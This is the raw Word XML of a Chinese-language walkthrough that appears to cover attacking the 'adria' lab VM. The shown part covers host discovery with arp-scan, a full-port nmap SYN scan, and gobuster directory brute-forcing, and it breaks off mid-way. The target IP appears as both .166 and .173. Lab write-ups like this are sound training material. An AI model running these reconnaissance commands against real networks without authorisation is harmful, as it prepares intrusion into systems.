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99AB8" w14:textId="2FB4E3EE" w:rsidR="00AD4BDD" w:rsidRPr="00D261D7" w:rsidRDefault="002703BA" w:rsidP="00C8379B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A</w:t>
      </w:r>
      <w:r w:rsidR="00F601F4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dria</w:t>
      </w:r>
      <w:r w:rsidR="0094090D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攻击流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EDF13B" w14:textId="25E65792" w:rsidR="00C710CD" w:rsidRPr="00D261D7" w:rsidRDefault="00C36967" w:rsidP="001B0FF8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信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42C9D6" w14:textId="287D560A" w:rsidR="00C36967" w:rsidRPr="00D261D7" w:rsidRDefault="00882680" w:rsidP="00C36967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主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753A2C6" w14:textId="15DD3BE2" w:rsidR="002703BA" w:rsidRDefault="004301E7" w:rsidP="004834A7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r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-scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r w:rsidR="00DF3D83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>内</w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>主机进行探测，</w:t>
      </w:r>
      <w:r w:rsidR="00DF3D83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r w:rsidR="003B2CC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>除</w:t>
      </w:r>
      <w:r w:rsidR="003B2CC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.1</w:t>
      </w:r>
      <w:r w:rsidR="00F601F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>73</w:t>
      </w:r>
      <w:r w:rsidR="003B2CC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>外均是该网络</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="003B2CC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的已知服务器</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，因此</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.1</w:t>
      </w:r>
      <w:r w:rsidR="00F601F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>73</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F601F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>adria</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机。</w:t>
      </w:r>
      <w:r w:rsidR="004769BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r w:rsidR="004769BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表扫描本地网络</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>指定扫描的网卡。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C71C2" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00B37704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79E333F" wp14:editId="111F548F">
            <wp:extent cx="5274310" cy="1948815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8845860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8600" name="图片 1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A41B" w14:textId="157151FC" w:rsidR="00B37704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1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D626F49" w14:textId="559BE1C9" w:rsidR="005A3A6C" w:rsidRPr="00CB547E" w:rsidRDefault="004F0474" w:rsidP="004834A7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注：为什么直接锁定到了靶机？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939A6A5" w14:textId="4F2EF575" w:rsidR="004F0474" w:rsidRPr="00CB547E" w:rsidRDefault="004F0474" w:rsidP="004834A7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解释：这里我们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已知</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F601F4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adria</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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是有漏洞的需要进行攻击</w:t>
      </w:r>
      <w:r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，</w:t>
      </w:r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因此实际上</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-scan</w:t>
      </w:r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在此只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起到了查找</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F601F4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adria</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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网络</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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的作用。在实际攻击场景中，我们并不清除哪个</w:t>
      </w:r>
      <w:r w:rsidR="007D135D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主机有漏洞，因此每个</w:t>
      </w:r>
      <w:r w:rsidR="00133DAF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探测到的</w:t>
      </w:r>
      <w:r w:rsidR="007D135D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主机都要尝试攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EEC6F3" w14:textId="31809997" w:rsidR="0080068B" w:rsidRPr="00D261D7" w:rsidRDefault="00C96A95" w:rsidP="0080068B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0" w:name="_Ref172016564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端口扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0303F7E2" w14:textId="7745AEFD" w:rsidR="0080068B" w:rsidRDefault="00BC1A65" w:rsidP="004834A7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nma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对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F601F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>adria</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(192.168.6.1</w:t>
      </w:r>
      <w:r w:rsidR="002703BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进行端口扫描</w:t>
      </w:r>
      <w:r w:rsidR="008747A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008747A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r w:rsidR="008747A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描模式</w:t>
      </w:r>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表不进行主机发现，</w:t>
      </w:r>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-p-</w:t>
      </w:r>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表扫描所有端口</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00950F3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现开放着</w:t>
      </w:r>
      <w:r w:rsidR="0045685D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="0045685D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008E7702">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="0045685D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0045685D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
      <w:r w:rsidR="0045685D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0045685D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>445</w:t>
      </w:r>
      <w:r w:rsidR="00950F3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2903E527" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="0045685D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8E5329C" wp14:editId="0D0D9AE2">
            <wp:extent cx="5274310" cy="1901825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="143382778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27785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28FC" w14:textId="2D559BB3" w:rsidR="0045685D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2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24962F5B" w14:textId="405A7A1E" w:rsidR="00950F3E" w:rsidRPr="00950F3E" w:rsidRDefault="00950F3E" w:rsidP="00950F3E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W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eb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路径扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F52B22" w14:textId="164B2B11" w:rsidR="0038424D" w:rsidRDefault="0038424D" w:rsidP="0023276C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命令行输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB5470" w:rsidRPr="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB5470" w:rsidRPr="00DB5470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="00DB5470" w:rsidRPr="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB5470" w:rsidRPr="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u '192.168.6.1</w:t>
      </w:r>
      <w:r w:rsidR="002B2FEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>73</w:t>
      </w:r>
      <w:r w:rsidR="00DB5470" w:rsidRPr="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/' -w '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB5470" w:rsidRPr="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB5470" w:rsidRPr="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB5470" w:rsidRPr="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB5470" w:rsidRPr="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/wordlists/directory-list-2.3-medium.txt' -x html,php,txt,zip,bak.jpg</w:t>
      </w:r>
      <w:r w:rsidR="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="002B2FEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这里显示该网</w:t>
      </w:r>
      <w:r w:rsidR="00DC538D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>站被重定向，这里排除一下</w:t>
      </w:r>
      <w:r w:rsidR="00DC538D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>345</w:t>
      </w:r>
      <w:r w:rsidR="00DC538D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>长度的数据包和一些无用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DC538D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>状态码即可</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C50357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043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="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u '192.168.6.173' -w '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/wordlists/directory-list-2.3-medium.txt' -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jpg,txt,html,bak,zip,php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00084043" w:rsidRPr="00084043">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --exclude-length 345 -b 302,400-405,500,301</w:t>
      </w:r>
      <w:r w:rsidR="00E85D27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。发现有几个可以访问的文件</w:t>
      </w:r>
      <w:r w:rsidR="00E85D27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>license.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E85D27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
